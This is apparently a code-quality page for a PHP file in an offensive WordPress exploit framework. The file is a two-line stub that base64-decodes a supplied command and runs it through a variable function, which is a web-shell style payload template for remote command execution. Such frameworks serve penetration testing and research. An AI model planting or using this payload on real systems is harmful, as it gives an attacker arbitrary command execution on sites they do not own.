rastating/wordpress-exploit-framework

View on GitHub
data/php/exec.php

Summary

Maintainability
A
0 mins
Test Coverage
<?php
  echo $wpxf_exec(base64_decode($cmd));
?>